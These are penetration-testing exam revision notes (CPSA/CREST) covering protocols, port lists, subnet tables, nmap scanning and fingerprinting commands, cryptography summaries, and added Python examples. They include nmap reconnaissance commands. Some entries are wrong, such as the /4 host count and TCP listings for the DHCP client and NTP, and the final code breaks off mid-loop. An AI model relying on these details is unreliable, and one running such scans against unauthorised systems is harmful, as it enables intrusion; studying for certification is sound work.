Cpsa Crest Revision 1) Core Technical Skills: IGRP - Interior Gateway Routing Protocol

This document provides an overview of core technical skills including: 1. IP protocols such as IP, TCP, UDP, ICMP, and routing protocols like RIP, OSPF, BGP, and IGRP. 2. MAC addresses, classful networking, CIDR notation, and subnet masks. 3. Common network ports used for services like HTTP, SSH, SMTP, DNS, DHCP, SQL, and more.

Uploaded by Viet Quang Tran

CPSA CREST REVISION

1) Core Technical Skills

B1) IP Protocols

IP Protocols
Internet Protocol (IP)
Transmission Control Protocol (TCP)
User Datagram Protocol (UDP)
Internet Control Message Protocol (ICMP)

Routing Protocols:
RIP - Routing Information Protocol
OSPF - Open Shortest Path First
BGP - Border Gateway Protocol
IGRP - Interior Gateway Routing Protocol

https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers

Hex   Number  Keyword     Protocol                                   References/RFC
0x00  0       HOPOPT      IPv6 Hop-by-Hop Option                     RFC 8200
0x01  1       ICMP        Internet Control Message Protocol          RFC 792
0x02  2       IGMP        Internet Group Management Protocol         RFC 1112
0x03  3       GGP         Gateway-to-Gateway Protocol                RFC 823
0x06  6       TCP         Transmission Control Protocol              RFC 793
0x08  8       EGP         Exterior Gateway Protocol                  RFC 888
0x09  9       IGP         Interior Gateway Protocol (any private interior gateway; used by Cisco for their IGRP)
0x11  17      UDP         User Datagram Protocol                     RFC 768
0x29  41      IPv6        IPv6 Encapsulation                         RFC 2473
0x2B  43      IPv6-Route  Routing Header for IPv6                    RFC 8200
0x2C  44      IPv6-Frag   Fragment Header for IPv6                   RFC 8200
0x32  50      ESP         Encapsulating Security Payload             RFC 4303
0x33  51      AH          Authentication Header                      RFC 4302
0x3A  58      IPv6-ICMP   ICMP for IPv6                              RFC 4443, RFC 4884
0x3B  59      IPv6-NoNxt  No Next Header for IPv6                    RFC 8200
0x3C  60      IPv6-Opts   Destination Options for IPv6               RFC 8200

MAC Address:
A media access control address (MAC address) of a computer is a unique identifier assigned to network
interfaces for communications at the data link layer of a network segment.
MAC has a 48-bit address space.
What is the subnet mask for a /23 network?

255.255.254.0

Which ports to open for VPN services? (AH, ESP)

a) PPTP tunnel based VPN uses TCP port 1723 and IP protocol number 47 (GRE). Please note: 47 is the IP
protocol number of GRE and not a port number inside a TCP or UDP header.

b) L2TP tunnel based VPN uses IPsec: UDP port 500 (IKE) and 4500 (NAT-T), and IP protocol number 50 (ESP).
Note: same comment as above, it is IP protocol 50 and not a port number inside TCP or UDP.

c) SSTP tunnel uses TCP port 443 (SSL)

What is the default port of DB2?

TCP 50000

What is running on port 3128?

Squid Proxy

What is running on port 1524?

Ingress

How many TCP ports in total?

65535 ports

What is running on port 1723?

PPTP

Classful network:

Class  Prefix  # of Hosts    Netmask (Binary)                      Netmask (Decimal)
CIDR   /4      240,435,456   11110000 00000000 00000000 00000000   240.0.0.0
CIDR   /5      134,217,728   11111000 00000000 00000000 00000000   248.0.0.0
CIDR   /6      67,108,864    11111100 00000000 00000000 00000000   252.0.0.0
CIDR   /7      33,554,432    11111110 00000000 00000000 00000000   254.0.0.0
A      /8      16,777,216    11111111 00000000 00000000 00000000   255.0.0.0
CIDR   /9      8,388,608     11111111 10000000 00000000 00000000   255.128.0.0
CIDR   /10     4,194,304     11111111 11000000 00000000 00000000   255.192.0.0
CIDR   /11     2,097,152     11111111 11100000 00000000 00000000   255.224.0.0
CIDR   /12     1,048,576     11111111 11110000 00000000 00000000   255.240.0.0
CIDR   /13     524,288       11111111 11111000 00000000 00000000   255.248.0.0
CIDR   /14     262,144       11111111 11111100 00000000 00000000   255.252.0.0
CIDR   /15     131,072       11111111 11111110 00000000 00000000   255.254.0.0
B      /16     65,534        11111111 11111111 00000000 00000000   255.255.0.0
CIDR   /17     32,768        11111111 11111111 10000000 00000000   255.255.128.0
CIDR   /18     16,384        11111111 11111111 11000000 00000000   255.255.192.0
CIDR   /19     8,192         11111111 11111111 11100000 00000000   255.255.224.0
CIDR   /20     4,096         11111111 11111111 11110000 00000000   255.255.240.0
CIDR   /21     2,048         11111111 11111111 11111000 00000000   255.255.248.0
CIDR   /22     1,024         11111111 11111111 11111100 00000000   255.255.252.0
CIDR   /23     512           11111111 11111111 11111110 00000000   255.255.254.0
C      /24     256           11111111 11111111 11111111 00000000   255.255.255.0
CIDR   /25     128           11111111 11111111 11111111 10000000   255.255.255.128
CIDR   /26     64            11111111 11111111 11111111 11000000   255.255.255.192
CIDR   /27     32            11111111 11111111 11111111 11100000   255.255.255.224
CIDR   /28     16            11111111 11111111 11111111 11110000   255.255.255.240
CIDR   /29     8             11111111 11111111 11111111 11111000   255.255.255.248
CIDR   /30     4             11111111 11111111 11111111 11111100   255.255.255.252
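As an added example (not part of the original revision notes), the Python below derives the netmask, address count and classful class behind the table above and the /23 question, and works out which block a given host address belongs to; it returns both the raw address count and the usable host count, which is two lower on ordinary subnets.

```python
import ipaddress


def mask_for_prefix(prefix: int) -> tuple:
    """Return (binary, dotted-decimal) netmask for an IPv4 prefix length, e.g. /23 -> 255.255.254.0."""
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix length must be between 0 and 32")
    mask_int = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF  # 'prefix' ones followed by zeros
    binary = " ".join(f"{(mask_int >> shift) & 0xFF:08b}" for shift in (24, 16, 8, 0))
    return binary, str(ipaddress.IPv4Address(mask_int))


def address_count(prefix: int) -> int:
    """Total addresses in a block: 2 raised to the number of host bits."""
    return 1 << (32 - prefix)


def usable_hosts(prefix: int) -> int:
    """Addresses minus the network and broadcast address; /31 (RFC 3021) and /32 use every address."""
    total = address_count(prefix)
    return total - 2 if prefix <= 30 else total


def classful_class(address: str) -> str:
    """Class of an address under the pre-CIDR classful scheme, decided by its first octet."""
    first_octet = int(ipaddress.IPv4Address(address)) >> 24
    if first_octet < 128:
        return "A"
    if first_octet < 192:
        return "B"
    if first_octet < 224:
        return "C"
    return "D" if first_octet < 240 else "E"


def describe(cidr: str) -> dict:
    """Work out the block an address belongs to, e.g. host 192.168.1.77/23 sits in 192.168.0.0/23."""
    net = ipaddress.ip_network(cidr, strict=False)  # strict=False accepts a host address, not only a network
    binary, dotted = mask_for_prefix(net.prefixlen)
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "netmask_binary": binary,
        "netmask_decimal": dotted,
        "addresses": address_count(net.prefixlen),
        "usable_hosts": usable_hosts(net.prefixlen),
        "classful_class": classful_class(str(net.network_address)),
    }


def mask_table(first: int = 4, last: int = 30) -> list:
    """Rows of (prefix, addresses, binary mask, dotted mask) covering the same range as the table above."""
    return [(f"/{p}", address_count(p), *mask_for_prefix(p)) for p in range(first, last + 1)]


if __name__ == "__main__":
    for row in mask_table():
        print(f"{row[0]:>4}  {row[1]:>13,}  {row[2]}  {row[3]}")
    print(describe("192.168.1.77/23"))
```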

List of Ports:
http://packetlife.net/media/library/23/common-ports.pdf

Port   Protocol  Service
19     UDP       CHARGEN
21     TCP       FTP (File Transfer Protocol)
22     TCP/UDP   SSH (ssh, scp copy or sftp)
23     TCP/UDP   Telnet
25     TCP/UDP   SMTP (for sending outgoing email)
43     TCP       WHOIS
53     TCP/UDP   DNS server (domain name service for DNS requests)
67     UDP       DHCP server
68     TCP       DHCP client
70     TCP       Gopher protocol
79     TCP       Finger protocol
110    TCP       POP3 (for receiving email)
119    TCP       NNTP (Network News Transfer Protocol)
123    TCP       NTP (Network Time Protocol)
143    TCP/UDP   IMAP4 (for email service)
194    TCP       IRC
389    TCP/UDP   LDAP (Lightweight Directory Access Protocol)
443    TCP       Secure HTTP over SSL (HTTPS)
465    TCP       Secure SMTP (email) using SSL
500    UDP       IKE
512    TCP       r-exec
513    TCP       r-login
514    TCP       r-services
520    UDP       RIP
636    TCP/UDP   LDAP over SSL
990    TCP/UDP   Secure FTP using SSL
993    TCP       Secure IMAP over SSL (for email)
1433   TCP/UDP   Microsoft SQL Server
2082   TCP       cPanel default port
2083   TCP       cPanel over SSL
2086   TCP       cPanel WebHost Manager (default)
2087   TCP       cPanel WebHost Manager (with HTTPS)
2095   TCP       cPanel webmail
2096   TCP       cPanel secure webmail over SSL
2222   TCP       DirectAdmin server control panel
3306   TCP/UDP   MySQL database server
4643   TCP       Virtuozzo Power Panel
5432   TCP       PostgreSQL database server
6000   TCP       X11 (X server on Unix)
8080   TCP       HTTP alternative port (for port 80)
8087   TCP       Plesk control panel port (default)
8443   TCP       Plesk server control panel over SSL
9999   TCP       Urchin web analytics
10000  TCP       Webmin server control panel
19638  TCP       Ensim server control panel

What is on port 123?

Network Time Protocol (NTP). TCP as well as UDP

What is on port 110?

POP3, for retrieving mail. TCP as well as UDP

What is on port 19?

Character Generator (CHARGEN). TCP as well as UDP

What is on port 7?

Echo

What is on port 5432?

PostgreSQL

What is on port 23?

Telnet

What is on port 520?

Routing Information Protocol (RIP), UDP

What is on port 512?

r-exec

What is on port 513?

r-login

What is on port 514?

r-shell

What is on port 79?

Finger

Which port does MSSQL use, and which in hidden mode?

TCP port 1433, and 2433 in hidden mode

What is the default port of the Oracle database?

1521, TCP

What port is used for IPsec?

500 (Internet Key Exchange)

What does IKE stand for?

Internet Key Exchange
In computing, Internet Key Exchange (IKE, sometimes IKEv1 or IKEv2, depending on version) is the protocol
used to set up a security association (SA) in the IPsec protocol suite. IKE builds upon the Oakley protocol and
ISAKMP.[1] IKE uses X.509 certificates for authentication, either pre-shared or distributed using DNS
(preferably with DNSSEC), and a Diffie–Hellman key exchange to set up a shared session secret from
which cryptographic keys are derived.[2][3] In addition, a security policy for every peer which will connect
must be manually maintained.[2]

What does LSASS stand for?

Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that
is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows
computer or server, handles password changes, and creates access tokens.[1] It also writes to the Windows
Security Log.

What does SAM stand for?

The Security Account Manager (SAM) is a database file[1] in Windows XP, Windows Vista and Windows 7 that
stores users' passwords. It can be used to authenticate local and remote users. Beginning with Windows 2000
SP4, Active Directory authenticates remote users. SAM uses cryptographic measures to prevent unauthorised
users from gaining access to the system.

What does EAP stand for?

Extensible Authentication Protocol, or EAP, is an authentication framework frequently used in wireless
networks and point-to-point connections.

EAP is an authentication framework, not a specific authentication mechanism.[1] It provides some common
functions and negotiation of authentication methods called EAP methods. There are currently about 40
different methods defined.

What does WPA stand for?

Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security
certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance
defined these in response to serious weaknesses researchers had found in the previous system, Wired
Equivalent Privacy (WEP).[1]

What do SMS, SUS, WSUS and MBSA stand for?

Windows Update Agent (WUA)
Systems Management Server (SMS)
Server Update Services (SUS)
Windows Server Update Services (WSUS)
Microsoft Baseline Security Analyzer (MBSA)

What does OSPF stand for?

Open Shortest Path First (OSPF) is a routing protocol for Internet Protocol (IP) networks. It uses a link-state
routing (LSR) algorithm and falls into the group of interior routing protocols, operating within a single
autonomous system (AS).

What does RIP stand for?

The Routing Information Protocol (RIP) is one of the oldest distance-vector routing protocols; it employs
the hop count as its routing metric. RIP prevents routing loops by implementing a limit on the number of hops
allowed in a path from source to destination. The maximum number of hops allowed for RIP is 15, which limits
the size of networks that RIP can support. A hop count of 16 is considered an infinite distance and the route is
considered unreachable. RIP implements the split horizon, route poisoning and holddown mechanisms to
prevent incorrect routing information from being propagated.

What does TKIP stand for?

Temporal Key Integrity Protocol (TKIP) was a stopgap security protocol used in the IEEE 802.11
wireless networking standard. TKIP was designed by the IEEE 802.11i task group and the Wi-Fi Alliance as an
interim solution to replace WEP without requiring the replacement of legacy hardware.

What does STP stand for?

The Spanning Tree Protocol (STP) is a network protocol that builds a logical loop-free topology for Ethernet
networks. The basic function of STP is to prevent bridge loops and the broadcast radiation that results from
them.

What does PGP stand for?

Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for
data communication. PGP is often used for signing, encrypting, and decrypting texts, e-mails, files, directories,
and whole disk partitions and to increase the security of e-mail communications.

What does DES stand for?

The Data Encryption Standard (DES) is a symmetric-key algorithm for the encryption of electronic data.
Its successor is 3DES.

What is the use of EICAR?

Being a self-standing term now, it stood originally for European Institute for Computer Antivirus Research.
However, we are now busy in the general IT security field with a focus on AV and hence we do not refer to the
full term anymore.

EICAR is a text file with a signature recognised by all AV vendors to test whether a virus is detected by the AV
engine. EICAR is not a virus by itself.

How does traceroute work?

In Linux, traceroute by default sends a sequence of User Datagram Protocol (UDP) packets addressed to a
destination host; ICMP Echo Request or TCP SYN packets can also be used.[1] In Windows, traceroute sends
ICMP echo requests instead of UDP packets.[2] The time-to-live (TTL) value, also known as hop limit, is used in
determining the intermediate routers being traversed towards the destination. Routers decrement TTL values
of packets by one when routing and discard packets whose TTL value has reached zero, returning the ICMP
error message ICMP Time Exceeded.[3] Common default values for the initial TTL are 128 (Windows OS) and
64 (Unix-based OS).

Traceroute works by sending packets with gradually increasing TTL value, starting with a TTL value of one. The
first router receives the packet, decrements the TTL value and drops the packet because it then has TTL value
zero. The router sends an ICMP Time Exceeded message back to the source. The next set of packets are given a
TTL value of two, so the first router forwards the packets, but the second router drops them and replies with
ICMP Time Exceeded. Proceeding in this way, traceroute uses the returned ICMP Time Exceeded messages to
build a list of routers that packets traverse, until the destination is reached and returns an ICMP Echo Reply
message.[3]

What does AJAX stand for?

Ajax (also AJAX; short for asynchronous JavaScript and XML)[1][2][3] is a set of web development
techniques using many web technologies on the client side to create asynchronous web applications.

What does SOAP stand for?

SOAP (Simple Object Access Protocol) is a protocol specification for exchanging structured information in the
implementation of web services in computer networks.

What does IIS stand for?

Internet Information Services (IIS, formerly Internet Information Server) is an extensible web server created by
Microsoft for use with the Windows NT family.[2] IIS supports HTTP, HTTPS, FTP, FTPS, SMTP and NNTP. It has
been an integral part of the Windows NT family since Windows NT 4.0, though it may be absent from some
editions (e.g. Windows XP Home edition), and is not active by default.

What does URI stand for?

In information technology, a Uniform Resource Identifier (URI) is a string of characters used to identify a
resource. Such identification enables interaction with representations of the resource over a network, typically
the World Wide Web, using specific protocols. Schemes specifying a concrete syntax and associated protocols
define each URI. The most common form of URI is the Uniform Resource Locator (URL), frequently referred to
informally as a web address.

What does HTTP stand for?

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia
information systems.[1] HTTP is the foundation of data communication for the World Wide Web.

What does FSMO stand for?

Flexible Single Master Operations (FSMO, the F is sometimes "floating"; pronounced "fiz-mo"), or just single master
operation or operations master, is a feature of Microsoft's Active Directory (AD).[1] As of 2005, the term FSMO
has been deprecated in favour of operations masters.

What does NETBIOS stand for?

NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the
session layer of the OSI model, allowing applications on separate computers to communicate over a local area
network. As strictly an API, NetBIOS is not a networking protocol.

B2) Network Architectures

WEP (Wired Equivalent Privacy)

64-bit WEP key: 40-bit key + 24-bit IV (initialization vector)
128-bit WEP key: 104-bit key + 24-bit IV (initialization vector)

B4) Network Mapping & Target Identification

Map route between engagement point and target:

• traceroute (uses UDP or ICMP echo)
• tcptraceroute (uses TCP SYN)
• tracert (Windows)

Network sweeping (Ping Sweep)

• An ICMP sweep (ICMP ECHO request) is a basic network scanning technique used to determine which of
a range of IP addresses map to live hosts (computers). Whereas a single ping will tell you whether one
specified host computer exists on the network, a ping sweep consists of ICMP (Internet Control
Message Protocol) ECHO requests sent to multiple hosts. If a given address is live, it will return an
ICMP ECHO reply. Ping sweeps are among the older and slower methods used to scan a network.

o nmap -sn 192.168.1.1 (no port scan, only check whether hosts are up)
▪ The default host discovery done with -sn consists of an ICMP echo request, TCP SYN
to port 443, TCP ACK to port 80, and an ICMP timestamp request.
o fping 192.168.1.1
▪ http://itswapshop.com/tutorial/fping-tutorial-how-use-fping-examples
• Sending ICMP ECHO requests to the network and/or broadcast addresses will produce all
the information you need for mapping a targeted network.
o Some systems will not reply to ICMP ECHO requests sent to the broadcast address, so this is not very
reliable.

Network sweeping (TCP)

With the TCP Sweep technique, instead of sending ICMP ECHO request packets we send TCP ACK or TCK SYN
packets (depending if we have root access or not) to the target network. The port number can be selected to
meet our needs. Usually a good pick would be one of the following ports – 21 / 22 / 23 / 25 / 80 (especially if a
firewall is protecting the targeted network). Receiving a response is a good indication that something is up
there. The response depends on the target’s operating system, the nature of the packet sent and any firewalls,
routers or packet-filtering devices used. Bear in mind that firewalls can spoof a RESET packet for an IP address,
so TCP Sweeps may not be reliable.

• nmap -sn 192.168.1.1 (no port scan, only check if hosts are up)
o The default host discovery done with -sn consists of an ICMP echo request, TCP SYN to port
443, TCP ACK to port 80, and an ICMP timestamp request by default.
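Added example, not from the original notes: a small defender-side detector that turns the ICMP sweep and TCP sweep descriptions above into detection logic, flagging a source that probes many hosts in a short window and a (source, target) pair that receives the complete default nmap -sn probe set (ICMP echo, TCP SYN to 443, TCP ACK to 80, ICMP timestamp). The netfilter-style log format, the sample lines and the thresholds are assumptions constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log in a simplified netfilter-style key=value format (assumption for this demo).
# 10.0.0.5 sends the four-probe nmap -sn set to 192.168.1.1 and an ICMP echo sweep across .2-.8;
# 10.0.0.9 is ordinary traffic (one ping, one SSH connection, one DNS query) and must not be flagged.
SAMPLE_LOG = """\
2024-05-01T10:00:01 SRC=10.0.0.5 DST=192.168.1.1 PROTO=ICMP TYPE=8
2024-05-01T10:00:01 SRC=10.0.0.5 DST=192.168.1.1 PROTO=TCP DPT=443 FLAGS=S
2024-05-01T10:00:01 SRC=10.0.0.5 DST=192.168.1.1 PROTO=TCP DPT=80 FLAGS=A
2024-05-01T10:00:01 SRC=10.0.0.5 DST=192.168.1.1 PROTO=ICMP TYPE=13
2024-05-01T10:00:02 SRC=10.0.0.5 DST=192.168.1.2 PROTO=ICMP TYPE=8
2024-05-01T10:00:03 SRC=10.0.0.5 DST=192.168.1.3 PROTO=ICMP TYPE=8
2024-05-01T10:00:04 SRC=10.0.0.5 DST=192.168.1.4 PROTO=ICMP TYPE=8
2024-05-01T10:00:05 SRC=10.0.0.5 DST=192.168.1.5 PROTO=ICMP TYPE=8
2024-05-01T10:00:06 SRC=10.0.0.5 DST=192.168.1.6 PROTO=ICMP TYPE=8
2024-05-01T10:00:07 SRC=10.0.0.5 DST=192.168.1.7 PROTO=ICMP TYPE=8
2024-05-01T10:00:08 SRC=10.0.0.5 DST=192.168.1.8 PROTO=ICMP TYPE=8
2024-05-01T10:05:00 SRC=10.0.0.9 DST=192.168.1.1 PROTO=ICMP TYPE=8
2024-05-01T10:05:01 SRC=10.0.0.9 DST=192.168.1.50 PROTO=TCP DPT=22 FLAGS=S
2024-05-01T10:05:01 SRC=10.0.0.9 DST=192.168.1.50 PROTO=TCP DPT=22 FLAGS=PA
2024-05-01T10:05:02 SRC=10.0.0.9 DST=192.168.1.53 PROTO=UDP DPT=53
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+)"
    r"(?: TYPE=(?P<type>\d+))?(?: DPT=(?P<dpt>\d+))?(?: FLAGS=(?P<flags>\S+))?$"
)

# The default host-discovery probes of nmap -sn, as listed in the notes above.
NMAP_SN_PROBES = {("icmp-echo", None), ("tcp-syn", 443), ("tcp-ack", 80), ("icmp-timestamp", None)}


def parse_line(line):
    """Parse one log line into a dict, or return None for lines in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def probe_kind(rec):
    """Classify a packet as a discovery probe: (kind, dst_port), or None for non-probe traffic."""
    if rec["proto"] == "ICMP":
        kind = {"8": "icmp-echo", "13": "icmp-timestamp"}.get(rec["type"])
        return (kind, None) if kind else None
    if rec["proto"] == "TCP" and rec["flags"] in ("S", "A"):
        # A bare SYN or bare ACK is how both the TCP sweep and nmap -sn probe a host.
        return ("tcp-syn" if rec["flags"] == "S" else "tcp-ack", int(rec["dpt"] or 0))
    return None


def _probe_events(lines):
    """Yield (src, dst, ts, probe) for every line that is a discovery probe."""
    for line in lines:
        rec = parse_line(line)
        probe = probe_kind(rec) if rec else None
        if probe:
            yield rec["src"], rec["dst"], rec["ts"], probe


def detect_sweeps(lines, window_seconds=60, min_targets=5):
    """Return {src: sorted targets} for sources that probe >= min_targets distinct hosts in a window."""
    by_src = defaultdict(list)
    for src, dst, ts, _ in _probe_events(lines):
        by_src[src].append((ts, dst))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):  # slide the window from each start event
            targets = {dst for t, dst in events[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(targets) >= min_targets:
                alerts[src] = sorted(targets)
                break
    return alerts


def detect_nmap_sn_pattern(lines, window_seconds=5):
    """Return (src, dst) pairs that received the complete nmap -sn probe set within a window."""
    by_pair = defaultdict(list)
    for src, dst, ts, probe in _probe_events(lines):
        by_pair[(src, dst)].append((ts, probe))
    hits = []
    for pair, events in by_pair.items():
        events.sort(key=lambda e: e[0])
        for i, (t0, _) in enumerate(events):
            seen = {p for t, p in events[i:] if (t - t0).total_seconds() <= window_seconds}
            if NMAP_SN_PROBES <= seen:
                hits.append(pair)
                break
    return hits


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("sweep sources:", detect_sweeps(lines))
    print("nmap -sn signatures:", detect_nmap_sn_pattern(lines))
```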
B5) Interpreting Tool Output

Port scanner:
• Port ranges:
o The port numbers in the range from 0 to 1023 are the well-known ports or system ports.
They are used by system processes that provide widely used types of network services. On
Unix-like operating systems, a process must execute with superuser privileges to be able to
bind a network socket to an IP address using one of the well-known ports.
o The range of port numbers from 1024 to 49151 are the registered ports. They are assigned
by IANA for a specific service upon application by a requesting entity. On most systems,
registered ports can be used by ordinary users.
o The range 49152–65535 (2^15 + 2^14 to 2^16 − 1) contains dynamic or private ports that cannot
be registered with IANA. This range is used for private or customized services, for temporary
purposes and for automatic allocation of ephemeral ports.
• Types of scanning method
o -sS (TCP SYN scan)
o -sT (TCP connect scan)
o -sU (UDP scan)
o -sY (SCTP INIT scan)
o -sN; -sF; -sX (TCP NULL, FIN, and Xmas scans)
o -sA (TCP ACK scan)

• tcpdump
o Interpreting tcpdump output: http://packetpushers.net/masterclass-tcpdump-interpreting-output/

Generic TCP. Here’s a line of output related to an SSH session. Note the -v parameter has been used, without
it, the IP header information and
Generic UDP. Response with -v, as you can see, without it the IP header information and the UDP information
is not displayed;
TTL List
B6) Filtering Avoidance Techniques

Ingress:
Network traffic that originates from outside of the network's routers and proceeds toward a destination inside
of the network.

Egress:
Network traffic that begins inside of a network and proceeds through its routers to a destination somewhere
outside of the network.

As a defence-in-depth measure, not only ingress but also egress traffic should be restricted. This makes it
harder for an attacker to start a reverse shell from the server, if only the services running on the server are
allowed to connect to the outside world.

B8) OS Fingerprinting

Active fingerprinting:
Active fingerprinting is the process of transmitting packets to a remote host and analysing the corresponding
replies.

Passive fingerprinting:
Passive fingerprinting is the process of analysing packets from a host on a network. In this case, the fingerprinter
acts as a sniffer and does not put any traffic on the network.

Active fingerprinting using nmap:

• OS detection (-O) and version scan (-sV)
- nmap -O -sV -v <IP>
• Use IPv6 (-6)
- nmap -6 -O -sV -v <IP>

Passive fingerprinting tools: NetworkMiner, Satori and p0f

B9) Application Fingerprinting and Evaluating Unknown Services

• nmap -sV -sC -T4 -F <IP>
-sV is for version scanning
-sC scans using the default nmap scripts

Recall that -T4 causes nmap to go faster (more aggressive timing) and -F tells nmap to scan only ports
registered in nmap-services.

B10) Network Access Control Analysis

B11) Cryptography

Which of the following is symmetric encryption? MD2, MD5, AES

MD2, MD5 and SHA1 are hashing algorithms.
AES (Advanced Encryption Standard) is a symmetric encryption algorithm.

Differences between encryption and encoding.

If data is encrypted it can be decrypted again into the original clear text, but only by the person who is in
possession of the secret/key.

Encoding is the process of applying a specific code, such as letters, symbols and numbers, to data for
conversion into an equivalent cipher. Only the encoding scheme needs to be known (such as Base64) to decode the
data back into the clear text.

Symmetric / asymmetric encryption


Symmetric-key algorithms are algorithms for cryptography that use the same cryptographic keys for both
encryption of plaintext and decryption of ciphertext. The keys may be identical or there may be a simple
transformation to go between the two keys.

Asymmetric Encryption is a form of Encryption where keys come in pairs. What one key encrypts, only the
other can decrypt. Frequently (but not necessarily), the keys are interchangeable, in the sense that if key A
encrypts a message, then B can decrypt it, and if key B encrypts a message, then key A can decrypt it.

Data Encryption Standard (DES)

The Data Encryption Standard (DES) is a symmetric-key algorithm for the encryption of electronic data.
Although now considered insecure, it was highly influential in the advancement of modern cryptography.

Key sizes: 56 bits (+8 parity bits)
Block size: 64 bits
Structure: Balanced Feistel network
Rounds: 16

Triple Data Encryption Standard (3DES, or officially the Triple Data Encryption Algorithm, TDEA or Triple DEA)
The original DES cipher's key size of 56 bits was generally sufficient when that algorithm was designed, but the
availability of increasing computational power made brute-force attacks feasible. Triple DES provides a
relatively simple method of increasing the key size of DES to protect against such attacks, without the need to
design a completely new block cipher algorithm.

Key sizes: 168, 112 or 56 bits (keying option 1, 2, 3 respectively)
Block size: 64 bits
Structure: Feistel network
Rounds: 48 DES-equivalent rounds

Advanced Encryption Standard (AES)

AES, also known as Rijndael[4][5] (its original name), is a specification for the encryption of electronic data
established by the U.S. National Institute of Standards and Technology (NIST) in 2001.[6]

Key sizes: 128, 192 or 256 bits[1]
Block size: 128 bits[2]
Structure: Substitution-permutation network
Rounds: 10, 12 or 14 (depending on key size)

AES has 10 rounds for 128-bit keys, 12 rounds for 192-bit keys, and 14 rounds for 256-bit keys.

RSA (Rivest, Shamir, Adleman)

RSA is one of the first practical public-key cryptosystems and is widely used for secure data transmission. In
such a cryptosystem, the encryption key is public and differs from the decryption key, which is kept secret. In
RSA, this asymmetry is based on the practical difficulty of factoring the product of two large prime numbers,
the factoring problem.
RSA is a relatively slow algorithm, and because of this it is less commonly used to directly encrypt user data.
More often, RSA passes encrypted shared keys for symmetric-key cryptography, which in turn can perform bulk
encryption and decryption operations at much higher speed.

Key sizes: 1,024 to 4,096 bits typical
Rounds: 1

RC4
In cryptography, RC4 (Rivest Cipher 4, also known as ARC4 or ARCFOUR, meaning Alleged RC4) is a
stream cipher. While remarkable for its simplicity and speed in software, multiple vulnerabilities have been
discovered in RC4, rendering it insecure.[3][4] It is especially vulnerable when the beginning of the output
keystream is not discarded, or when nonrandom or related keys are used. Particularly problematic uses of RC4
have led to very insecure protocols such as WEP.[5]

Key sizes: 40–2048 bits
State size: 2064 bits (1684 effective)
Rounds: 1

MD5
The MD5 algorithm is a widely used hash function producing a 128-bit hash value. Although MD5 was initially
designed to be used as a cryptographic hash function, it has been found to suffer from extensive
vulnerabilities. It can still be used as a checksum to verify data integrity, but only against unintentional
corruption.
Like most hash functions, MD5 is neither encryption nor encoding. It can be reversed by brute-force attack and
suffers from extensive vulnerabilities.

Digest size: 128 bits
Block size: 512 bits

SHA-1 (Secure Hash Algorithm 1)

In cryptography, SHA-1 (Secure Hash Algorithm 1) is a cryptographic hash function designed by the United
States National Security Agency and is a U.S. Federal Information Processing Standard published by the United
States NIST.[2] SHA-1 produces a 160-bit (20-byte) hash value known as a message digest. A SHA-1 hash value
is typically rendered as a hexadecimal number, 40 digits long.

Digest size: 160 bits
Block size: 512 bits
Structure: Merkle–Damgård construction
Rounds: 80

Hash-based message authentication code (HMAC)

In cryptography, a keyed-hash message authentication code (HMAC) is a specific type of message
authentication code (MAC) involving a cryptographic hash function (hence the 'H') in combination with a secret
cryptographic key. As with any MAC, it may be used to simultaneously verify both the data integrity and the
authentication of a message. Any cryptographic hash function, such as MD5 or SHA-1, may be used in the
calculation of an HMAC; the resulting MAC algorithm is termed HMAC-MD5 or HMAC-SHA1 accordingly. The
cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function,
the size of its hash output, and on the size and quality of the key.
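Added example (not from the original notes): HMAC built directly from hashlib's hash functions as described above, the inner hash keyed with K XOR ipad and the outer with K XOR opad per RFC 2104, so that swapping the hash gives HMAC-MD5, HMAC-SHA1 or HMAC-SHA256; it is cross-checked against Python's hmac module, and the key and message are constructed demo values.

```python
import hashlib
import hmac  # standard library implementation, used here only to cross-check the hand-built version

# Constructed demo values (assumptions for this example), not keys or data from any real system.
DEMO_KEY = b"constructed-demo-key"
DEMO_MESSAGE = b"amount=100&to=alice"


def hmac_from_scratch(key: bytes, message: bytes, hash_name: str = "sha1") -> bytes:
    """HMAC(K, m) = H((K' xor opad) || H((K' xor ipad) || m)), following RFC 2104."""
    h = getattr(hashlib, hash_name)
    block_size = h().block_size  # 64 bytes for MD5, SHA-1 and SHA-256: the 512-bit block size listed above
    # K' is the key hashed down if it is longer than one block, then zero-padded to exactly one block.
    if len(key) > block_size:
        key = h(key).digest()
    key_block = key.ljust(block_size, b"\x00")
    ipad_key = bytes(b ^ 0x36 for b in key_block)
    opad_key = bytes(b ^ 0x5C for b in key_block)
    inner = h(ipad_key + message).digest()   # inner hash binds the key to the message
    return h(opad_key + inner).digest()      # outer hash keys the result a second time


def verify_tag(key: bytes, message: bytes, tag: bytes, hash_name: str = "sha1") -> bool:
    """Recompute the tag and compare in constant time, so timing does not leak how many bytes matched."""
    return hmac.compare_digest(hmac_from_scratch(key, message, hash_name), tag)


def matches_stdlib(key: bytes, message: bytes, hash_name: str = "sha1") -> bool:
    """True when the hand-built HMAC agrees with Python's hmac module for this input."""
    expected = hmac.new(key, message, getattr(hashlib, hash_name)).digest()
    return hmac_from_scratch(key, message, hash_name) == expected


if __name__ == "__main__":
    for name in ("md5", "sha1", "sha256"):
        tag = hmac_from_scratch(DEMO_KEY, DEMO_MESSAGE, name)
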